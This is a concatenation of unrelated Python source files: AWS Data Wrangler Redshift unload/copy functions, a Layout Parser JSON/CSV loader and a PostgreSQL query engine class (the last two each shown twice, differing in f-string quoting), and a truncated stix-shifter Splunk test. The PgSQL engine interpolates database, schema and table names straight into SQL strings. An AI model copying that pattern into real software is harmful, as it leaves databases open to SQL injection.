Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- sql: str SQL query. path : Union[str, List[str]] S3 path to write stage files (e.g. s3://bucket_name/any_name/) con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. region : str, optional Specifies the AWS Region where the target Amazon S3 bucket is located. REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the same AWS Region as the Amazon Redshift cluster. By default, UNLOAD assumes that the target Amazon S3 bucket is located in the same AWS Region as the Amazon Redshift cluster. max_file_size : float, optional Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3. Specify a decimal value between 5.0 MB and 6200.0 MB. If None, the default maximum file size is 6200.0 MB. kms_key_id : str, optional Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be used to encrypt data files on Amazon S3. categories: List[str], optional List of columns names that should be returned as pandas.Categorical. Recommended for memory restricted environments. keep_files : bool Should keep stage files? chunked : Union[int, bool] If passed will split the data in a Iterable of DataFrames (Memory friendly). If `True` wrangler will iterate on the data by files in the most efficient way without guarantee of chunksize. If an `INTEGER` is passed Wrangler will iterate on the data by number of rows igual the received INTEGER. use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forward to botocore requests, only "SSECustomerAlgorithm" and "SSECustomerKey" arguments will be considered. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.unload( ... sql="SELECT * FROM public.mytable", ... path="s3://bucket/extracted_parquet_files/", ... con=con, ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ path = path if path.endswith("/") else f"{path}/" session: boto3.Session = _utils.ensure_session(session=boto3_session) unload_to_files( sql=sql, path=path, con=con, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, region=region, max_file_size=max_file_size, kms_key_id=kms_key_id, manifest=False, boto3_session=session, ) if chunked is False: df: pd.DataFrame = s3.read_parquet( path=path, categories=categories, chunked=chunked, dataset=False, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs ) return df return _read_parquet_iterator( path=path, categories=categories, chunked=chunked, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, keep_files=keep_files, ) def copy_from_files( # pylint: disable=too-many-locals,too-many-arguments path: str, con: redshift_connector.Connection, table: str, schema: str, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, parquet_infer_sampling: float = 1.0, mode: str = "append", overwrite_method: str = "drop", diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, serialize_to_json: bool = False, path_suffix: Optional[str] = None, path_ignore_suffix: Optional[str] = None, use_threads: Union[bool, int] = True, lock: bool = False, commit_transaction: bool = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> None: """Load Parquet files from S3 to a Table on Amazon Redshift (Through COPY command). https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html Note ---- If the table does not exist yet, it will be automatically created for you using the Parquet metadata to infer the columns data types. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- path : str S3 prefix (e.g. s3://bucket/prefix/) con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. parquet_infer_sampling : float Random sample ratio of files that will have the metadata inspected. Must be `0.0 < sampling <= 1.0`. The higher, the more accurate. The lower, the faster. mode : str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. diststyle : str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). serialize_to_json : bool Should Wrangler add SERIALIZETOJSON parameter into the COPY command? SERIALIZETOJSON is necessary to load nested data https://docs.aws.amazon.com/redshift/latest/dg/ingest-super.html#copy_json path_suffix: Union[str, List[str], None] Suffix or List of suffixes to be scanned on s3 for the schema extraction (e.g. [".gz.parquet", ".snappy.parquet"]). Only has effect during the table creation. If None, will try to read all files. (default) path_ignore_suffix: Union[str, List[str], None] Suffix or List of suffixes for S3 keys to be ignored during the schema extraction. (e.g. [".csv", "_SUCCESS"]). Only has effect during the table creation. If None, will try to read all files. (default) use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. commit_transaction: bool Whether to commit the transaction. True by default. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forwarded to botocore requests. e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'} Returns ------- None None. Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.copy_from_files( ... path="s3://bucket/my_parquet_files/", ... con=con, ... table="my_table", ... schema="public" ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ autocommit_temp: bool = con.autocommit con.autocommit = False try: with con.cursor() as cursor: created_table, created_schema = _create_table( df=None, path=path, parquet_infer_sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, con=con, cursor=cursor, table=table, schema=schema, mode=mode, overwrite_method=overwrite_method, diststyle=diststyle, sortstyle=sortstyle, distkey=distkey, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, index=False, dtype=None, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) if lock and table == created_table: # Lock before copy if copying into target (not temp) table _lock(cursor, [table], schema=schema) _copy( cursor=cursor, path=path, table=created_table, schema=created_schema, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=boto3_session, serialize_to_json=serialize_to_json, ) if table != created_table: # upsert if lock: _lock(cursor, [table], schema=schema) _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys) if commit_transaction: con.commit() except Exception as ex: con.rollback() _logger.error(ex) raise finally: con.autocommit = autocommit_temp def copy( # pylint: disable=too-many-arguments df: pd.DataFrame, path: str, con: redshift_connector.Connection, table: str, schema: str, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, index: bool = False, dtype: Optional[Dict[str, str]] = None, mode: str = "append", overwrite_method: str = "drop", diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, serialize_to_json: bool = False, keep_files: bool = False, use_threads: Union[bool, int] = True, lock: bool = False, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, max_rows_by_file: Optional[int] = 10_000_000, ) -> None: """Load Pandas DataFrame as a Table on Amazon Redshift using parquet files on S3 as stage. This is a **HIGH** latency and **HIGH** throughput alternative to `wr.redshift.to_sql()` to load large DataFrames into Amazon Redshift through the ** SQL COPY command**. This strategy has more overhead and requires more IAM privileges than the regular `wr.redshift.to_sql()` function, so it is only recommended to inserting +1K rows at once. https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html Note ---- If the table does not exist yet, it will be automatically created for you using the Parquet metadata to infer the columns data types. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- df: pandas.DataFrame Pandas DataFrame. path : str S3 path to write stage files (e.g. s3://bucket_name/any_name/). Note: This path must be empty. con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. index : bool True to store the DataFrame index in file, otherwise False to ignore it. dtype: Dict[str, str], optional Dictionary of columns names and Athena/Glue types to be casted. Useful when you have columns with undetermined or mixed data types. Only takes effect if dataset=True. (e.g. {'col name': 'bigint', 'col2 name': 'int'}) mode: str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. diststyle: str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). keep_files : bool Should keep stage files? use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forwarded to botocore requests. e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'} max_rows_by_file : int Max number of rows in each file. Default is None i.e. dont split the files. (e.g. 33554432, 268435456) Returns ------- None None. Examples -------- >>> import awswrangler as wr >>> import pandas as pd >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.copy( ... df=pd.DataFrame({'col': [1, 2, 3]}), ... path="s3://bucket/my_parquet_files/", ... con=con, ... table="my_table", ... schema="public" ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ path = path[:-1] if path.endswith("*") else path path = path if path.endswith("/") else f"{path}/" session: boto3.Session = _utils.ensure_session(session=boto3_session) if s3.list_objects(path=path, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs): raise exceptions.InvalidArgument( f"The received S3 path ({path}) is not empty. " "Please, provide a different path or use wr.s3.delete_objects() to clean up the current one." ) try: s3.to_parquet( df=df, path=path, index=index, dataset=True, mode="append", dtype=dtype, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, max_rows_by_file=max_rows_by_file, ) copy_from_files( path=path, con=con, table=table, schema=schema, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, mode=mode, overwrite_method=overwrite_method, diststyle=diststyle, distkey=distkey, sortstyle=sortstyle, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, serialize_to_json=serialize_to_json, use_threads=use_threads, lock=lock, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) finally: if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs )
# Copyright 2021 The Layout Parser team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import ast import json from typing import List, Union, Dict, Dict, Any import pandas as pd from ..elements import ( BaseLayoutElement, TextBlock, Layout, BASECOORD_ELEMENT_NAMEMAP, ) def load_json(filename: str) -> Union[BaseLayoutElement, Layout]: """Load a JSON file and save it as a layout object with appropriate data types. Args: filename (str): The name of the JSON file. Returns: Union[BaseLayoutElement, Layout]: Based on the JSON file format, it will automatically parse the type of the data and load it accordingly. """ with open(filename, "r") as fp: res = json.load(fp) return load_dict(res) def load_dict(data: Union[Dict, List[Dict]]) -> Union[BaseLayoutElement, Layout]: """Load a dict of list of dict representations of some layout data, automatically parse its type, and save it as any of BaseLayoutElement or Layout datatype. Args: data (Union[Dict, List]): A dict of list of dict representations of the layout data Raises: ValueError: If the data format is incompatible with the layout-data-JSON format, raise a `ValueError`. ValueError: If any `block_type` name is not in the available list of layout element names defined in `BASECOORD_ELEMENT_NAMEMAP`, raise a `ValueError`. Returns: Union[BaseLayoutElement, Layout]: Based on the dict format, it will automatically parse the type of the data and load it accordingly. """ if isinstance(data, dict): if "page_data" in data: # It is a layout instance return Layout(load_dict(data["blocks"]), page_data=data["page_data"]) else: if data["block_type"] not in BASECOORD_ELEMENT_NAMEMAP: raise ValueError(f"Invalid block_type {data["block_type"]}") # Check if it is a textblock is_textblock = any(ele in data for ele in TextBlock._features) if is_textblock: return TextBlock.from_dict(data) else: return BASECOORD_ELEMENT_NAMEMAP[data["block_type"]].from_dict(data) elif isinstance(data, list): return Layout([load_dict(ele) for ele in data]) else: raise ValueError(f"Invalid input JSON structure.") def load_csv(filename: str, block_type: str = None) -> Layout: """Load the Layout object from the given CSV file. Args: filename (str): The name of the CSV file. A row of the table represents an individual layout element. block_type (str): If there's no block_type column in the CSV file, you must pass in a block_type variable such that layout parser can appropriately detect the type of the layout elements. Returns: Layout: The parsed Layout object from the CSV file. """ return load_dataframe(pd.read_csv(filename), block_type=block_type) def load_dataframe(df: pd.DataFrame, block_type: str = None) -> Layout: """Load the Layout object from the given dataframe. Args: df (pd.DataFrame): block_type (str): If there's no block_type column in the CSV file, you must pass in a block_type variable such that layout parser can appropriately detect the type of the layout elements. Returns: Layout: The parsed Layout object from the CSV file. """ df = df.copy() if "points" in df.columns: if df["points"].dtype == object: df["points"] = df["points"].map( lambda x: ast.literal_eval(x) if not pd.isna(x) else x ) if block_type is None: if "block_type" not in df.columns: raise ValueError( "`block_type` not specified both in dataframe and arguments" ) else: df["block_type"] = block_type if "id" not in df.columns: df["id"] = df.index return load_dict(df.apply(lambda x: x.dropna().to_dict(), axis=1).to_list())
# Copyright 2021 The Layout Parser team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import ast import json from typing import List, Union, Dict, Dict, Any import pandas as pd from ..elements import ( BaseLayoutElement, TextBlock, Layout, BASECOORD_ELEMENT_NAMEMAP, ) def load_json(filename: str) -> Union[BaseLayoutElement, Layout]: """Load a JSON file and save it as a layout object with appropriate data types. Args: filename (str): The name of the JSON file. Returns: Union[BaseLayoutElement, Layout]: Based on the JSON file format, it will automatically parse the type of the data and load it accordingly. """ with open(filename, "r") as fp: res = json.load(fp) return load_dict(res) def load_dict(data: Union[Dict, List[Dict]]) -> Union[BaseLayoutElement, Layout]: """Load a dict of list of dict representations of some layout data, automatically parse its type, and save it as any of BaseLayoutElement or Layout datatype. Args: data (Union[Dict, List]): A dict of list of dict representations of the layout data Raises: ValueError: If the data format is incompatible with the layout-data-JSON format, raise a `ValueError`. ValueError: If any `block_type` name is not in the available list of layout element names defined in `BASECOORD_ELEMENT_NAMEMAP`, raise a `ValueError`. Returns: Union[BaseLayoutElement, Layout]: Based on the dict format, it will automatically parse the type of the data and load it accordingly. """ if isinstance(data, dict): if "page_data" in data: # It is a layout instance return Layout(load_dict(data["blocks"]), page_data=data["page_data"]) else: if data["block_type"] not in BASECOORD_ELEMENT_NAMEMAP: raise ValueError(f"Invalid block_type {data['block_type']}") # Check if it is a textblock is_textblock = any(ele in data for ele in TextBlock._features) if is_textblock: return TextBlock.from_dict(data) else: return BASECOORD_ELEMENT_NAMEMAP[data["block_type"]].from_dict(data) elif isinstance(data, list): return Layout([load_dict(ele) for ele in data]) else: raise ValueError(f"Invalid input JSON structure.") def load_csv(filename: str, block_type: str = None) -> Layout: """Load the Layout object from the given CSV file. Args: filename (str): The name of the CSV file. A row of the table represents an individual layout element. block_type (str): If there's no block_type column in the CSV file, you must pass in a block_type variable such that layout parser can appropriately detect the type of the layout elements. Returns: Layout: The parsed Layout object from the CSV file. """ return load_dataframe(pd.read_csv(filename), block_type=block_type) def load_dataframe(df: pd.DataFrame, block_type: str = None) -> Layout: """Load the Layout object from the given dataframe. Args: df (pd.DataFrame): block_type (str): If there's no block_type column in the CSV file, you must pass in a block_type variable such that layout parser can appropriately detect the type of the layout elements. Returns: Layout: The parsed Layout object from the CSV file. """ df = df.copy() if "points" in df.columns: if df["points"].dtype == object: df["points"] = df["points"].map( lambda x: ast.literal_eval(x) if not pd.isna(x) else x ) if block_type is None: if "block_type" not in df.columns: raise ValueError( "`block_type` not specified both in dataframe and arguments" ) else: df["block_type"] = block_type if "id" not in df.columns: df["id"] = df.index return load_dict(df.apply(lambda x: x.dropna().to_dict(), axis=1).to_list())
# -*- coding: UTF-8 -*- """ @author: hhyo、yyukai @license: Apache Licence @file: pgsql.py @time: 2019/03/29 """ import re import psycopg2 import logging import traceback import sqlparse from . import EngineBase from .models import ResultSet __author__ = 'hhyo、yyukai' logger = logging.getLogger('default') class PgSQLEngine(EngineBase): def get_connection(self, db_name=None): if self.conn: return self.conn db_name = db_name if db_name else 'postgres' self.conn = psycopg2.connect(host=self.host, port=self.port, user=self.user, password=self.password, dbname=db_name) return self.conn @property def name(self): return 'PgSQL' @property def info(self): return 'PgSQL engine' def get_all_databases(self): """ 获取数据库列表 :return: """ result = self.query(sql=f"SELECT datname FROM pg_database;") db_list = [row[0] for row in result.rows if row[0] not in ['postgres', 'template0', 'template1']] result.rows = db_list return result def get_all_schemas(self, db_name): """ 获取模式列表 :return: """ result = self.query(db_name=db_name, sql=f"select schema_name from information_schema.schemata;") schema_list = [row[0] for row in result.rows if row[0] not in ['information_schema', 'pg_catalog', 'pg_toast_temp_1', 'pg_temp_1', 'pg_toast']] result.rows = schema_list return result def get_all_tables(self, db_name, schema_name=None): """ 获取表列表 :param db_name: :param schema_name: :return: """ sql = f"""SELECT table_name FROM information_schema.tables where table_catalog='{db_name}' and table_schema ='{schema_name}';""" result = self.query(db_name=db_name, sql=sql) tb_list = [row[0] for row in result.rows if row[0] not in ['test']] result.rows = tb_list return result def get_all_columns_by_tb(self, db_name, tb_name, schema_name=None): """ 获取字段列表 :param db_name: :param tb_name: :param schema_name: :return: """ sql = f"""SELECT column_name FROM information_schema.columns where table_catalog='{db_name}' and table_name='{tb_name}' and table_schema ='{schema_name}';""" result = self.query(db_name=db_name, sql=sql) column_list = [row[0] for row in result.rows] result.rows = column_list return result def describe_table(self, db_name, tb_name, schema_name=None): """ 获取表结构信息 :param db_name: :param tb_name: :param schema_name: :return: """ sql = fr"""select col.column_name, col.data_type, col.character_maximum_length, col.numeric_precision, col.numeric_scale, col.is_nullable, col.column_default, des.description from information_schema.columns col left join pg_description des on col.table_name::regclass = des.objoid and col.ordinal_position = des.objsubid where table_catalog='{db_name}' and table_schema = '{schema_name}' and table_name = '{tb_name}' order by ordinal_position;""" result = self.query(db_name=db_name, sql=sql) return result def query_check(self, db_name=None, sql=''): # 查询语句的检查、注释去除、切分 result = {'msg': '', 'bad_query': False, 'filtered_sql': sql, 'has_star': False} # 删除注释语句,进行语法判断,执行第一条有效sql try: sql = sqlparse.format(sql, strip_comments=True) sql = sqlparse.split(sql)[0] result['filtered_sql'] = sql.strip() except IndexError: result['has_star'] = True result['msg'] = '没有有效的SQL语句' if re.match(r"^select", sql, re.I) is None: result['bad_query'] = True result['msg'] = '不支持的查询语法类型!' if '*' in sql: result['has_star'] = True result['msg'] = 'SQL语句中含有 * ' return result def query(self, db_name=None, sql='', limit_num=0, close_conn=True): """返回 ResultSet """ result_set = ResultSet(full_sql=sql) try: conn = self.get_connection(db_name=db_name) cursor = conn.cursor() cursor.execute(sql) effect_row = cursor.rowcount if int(limit_num) > 0: rows = cursor.fetchmany(size=int(limit_num)) else: rows = cursor.fetchall() fields = cursor.description result_set.column_list = [i[0] for i in fields] if fields else [] result_set.rows = rows result_set.affected_rows = effect_row except Exception as e: logger.error(f"PgSQL命令执行报错,语句:{sql}, 错误信息:{traceback.format_exc()}") result_set.error = str(e) finally: if close_conn: self.close() return result_set def filter_sql(self, sql='', limit_num=0): # 对查询sql增加limit限制,# TODO limit改写待优化 sql_lower = sql.lower().rstrip(';').strip() if re.match(r"^select", sql_lower): if re.search(r"limit\s+(\d+)$", sql_lower) is None: if re.search(r"limit\s+\d+\s*,\s*(\d+)$", sql_lower) is None: return f"{sql.rstrip(";")} limit {limit_num};" return f"{sql.rstrip(";")};" def query_masking(self, db_name=None, sql='', resultset=None): """不做脱敏""" return resultset def close(self): if self.conn: self.conn.close() self.conn = None
# -*- coding: UTF-8 -*- """ @author: hhyo、yyukai @license: Apache Licence @file: pgsql.py @time: 2019/03/29 """ import re import psycopg2 import logging import traceback import sqlparse from . import EngineBase from .models import ResultSet __author__ = 'hhyo、yyukai' logger = logging.getLogger('default') class PgSQLEngine(EngineBase): def get_connection(self, db_name=None): if self.conn: return self.conn db_name = db_name if db_name else 'postgres' self.conn = psycopg2.connect(host=self.host, port=self.port, user=self.user, password=self.password, dbname=db_name) return self.conn @property def name(self): return 'PgSQL' @property def info(self): return 'PgSQL engine' def get_all_databases(self): """ 获取数据库列表 :return: """ result = self.query(sql=f"SELECT datname FROM pg_database;") db_list = [row[0] for row in result.rows if row[0] not in ['postgres', 'template0', 'template1']] result.rows = db_list return result def get_all_schemas(self, db_name): """ 获取模式列表 :return: """ result = self.query(db_name=db_name, sql=f"select schema_name from information_schema.schemata;") schema_list = [row[0] for row in result.rows if row[0] not in ['information_schema', 'pg_catalog', 'pg_toast_temp_1', 'pg_temp_1', 'pg_toast']] result.rows = schema_list return result def get_all_tables(self, db_name, schema_name=None): """ 获取表列表 :param db_name: :param schema_name: :return: """ sql = f"""SELECT table_name FROM information_schema.tables where table_catalog='{db_name}' and table_schema ='{schema_name}';""" result = self.query(db_name=db_name, sql=sql) tb_list = [row[0] for row in result.rows if row[0] not in ['test']] result.rows = tb_list return result def get_all_columns_by_tb(self, db_name, tb_name, schema_name=None): """ 获取字段列表 :param db_name: :param tb_name: :param schema_name: :return: """ sql = f"""SELECT column_name FROM information_schema.columns where table_catalog='{db_name}' and table_name='{tb_name}' and table_schema ='{schema_name}';""" result = self.query(db_name=db_name, sql=sql) column_list = [row[0] for row in result.rows] result.rows = column_list return result def describe_table(self, db_name, tb_name, schema_name=None): """ 获取表结构信息 :param db_name: :param tb_name: :param schema_name: :return: """ sql = fr"""select col.column_name, col.data_type, col.character_maximum_length, col.numeric_precision, col.numeric_scale, col.is_nullable, col.column_default, des.description from information_schema.columns col left join pg_description des on col.table_name::regclass = des.objoid and col.ordinal_position = des.objsubid where table_catalog='{db_name}' and table_schema = '{schema_name}' and table_name = '{tb_name}' order by ordinal_position;""" result = self.query(db_name=db_name, sql=sql) return result def query_check(self, db_name=None, sql=''): # 查询语句的检查、注释去除、切分 result = {'msg': '', 'bad_query': False, 'filtered_sql': sql, 'has_star': False} # 删除注释语句,进行语法判断,执行第一条有效sql try: sql = sqlparse.format(sql, strip_comments=True) sql = sqlparse.split(sql)[0] result['filtered_sql'] = sql.strip() except IndexError: result['has_star'] = True result['msg'] = '没有有效的SQL语句' if re.match(r"^select", sql, re.I) is None: result['bad_query'] = True result['msg'] = '不支持的查询语法类型!' if '*' in sql: result['has_star'] = True result['msg'] = 'SQL语句中含有 * ' return result def query(self, db_name=None, sql='', limit_num=0, close_conn=True): """返回 ResultSet """ result_set = ResultSet(full_sql=sql) try: conn = self.get_connection(db_name=db_name) cursor = conn.cursor() cursor.execute(sql) effect_row = cursor.rowcount if int(limit_num) > 0: rows = cursor.fetchmany(size=int(limit_num)) else: rows = cursor.fetchall() fields = cursor.description result_set.column_list = [i[0] for i in fields] if fields else [] result_set.rows = rows result_set.affected_rows = effect_row except Exception as e: logger.error(f"PgSQL命令执行报错,语句:{sql}, 错误信息:{traceback.format_exc()}") result_set.error = str(e) finally: if close_conn: self.close() return result_set def filter_sql(self, sql='', limit_num=0): # 对查询sql增加limit限制,# TODO limit改写待优化 sql_lower = sql.lower().rstrip(';').strip() if re.match(r"^select", sql_lower): if re.search(r"limit\s+(\d+)$", sql_lower) is None: if re.search(r"limit\s+\d+\s*,\s*(\d+)$", sql_lower) is None: return f"{sql.rstrip(';')} limit {limit_num};" return f"{sql.rstrip(';')};" def query_masking(self, db_name=None, sql='', resultset=None): """不做脱敏""" return resultset def close(self): if self.conn: self.conn.close() self.conn = None
import logging from stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator from stix_shifter.stix_translation import stix_translation from stix_shifter_modules.splunk.entry_point import EntryPoint from stix2validator import validate_instance from stix_shifter_modules.splunk.stix_translation.splunk_utils import hash_type_lookup from stix_shifter_utils.stix_translation.src.utils.transformer_utils import get_module_transformers MODULE = "splunk" logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger() entry_point = EntryPoint() map_data = entry_point.get_results_translator().map_data data_source = { "type": "identity", "id": "identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3", "name": "Splunk", "identity_class": "events" } options = {} class TestTransform(object): @staticmethod def get_first(itr, constraint): return next( (obj for obj in itr if constraint(obj)), None ) @staticmethod def get_first_of_type(itr, typ): return TestTransform.get_first(itr, lambda o: type(o) == dict and o.get('type') == typ) def test_common_prop(self): data = {"_time": "2018-08-21T15:11:55.000+00:00", "event_count": 5} result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] result_bundle_identity = result_bundle_objects[0] assert(result_bundle_identity['type'] == data_source['type']) assert(result_bundle_identity['id'] == data_source['id']) assert(result_bundle_identity['name'] == data_source['name']) assert(result_bundle_identity['identity_class'] == data_source['identity_class']) observed_data = result_bundle_objects[1] assert(observed_data['id'] is not None) assert(observed_data['type'] == "observed-data") assert(observed_data['created_by_ref'] == result_bundle_identity['id']) assert(observed_data['number_observed'] == 5) assert(observed_data['created'] is not None) assert(observed_data['modified'] is not None) assert(observed_data['first_observed'] is not None) assert(observed_data['last_observed'] is not None) def test_change_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" file_bytes = "300" user = "ibm_user" objPath = "hkey_local_machine\\system\\bar\\foo" filePath = "C:\\Users\\someuser\\sample.dll" create_time = "2018-08-15T15:11:55.676+00:00" modify_time = "2018-08-15T18:10:30.456+00:00" file_hash = "41a26255d16d121dc525a6445144b895" file_name = "sample.dll" file_size = 25536 data = { "event_count": count, "_time": time, "user": user, "bytes": file_bytes, "object_path": objPath, "file_path": filePath, "file_create_time": create_time, "file_modify_time": modify_time, "file_hash": file_hash, "file_size": file_size, "file_name": file_name } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = 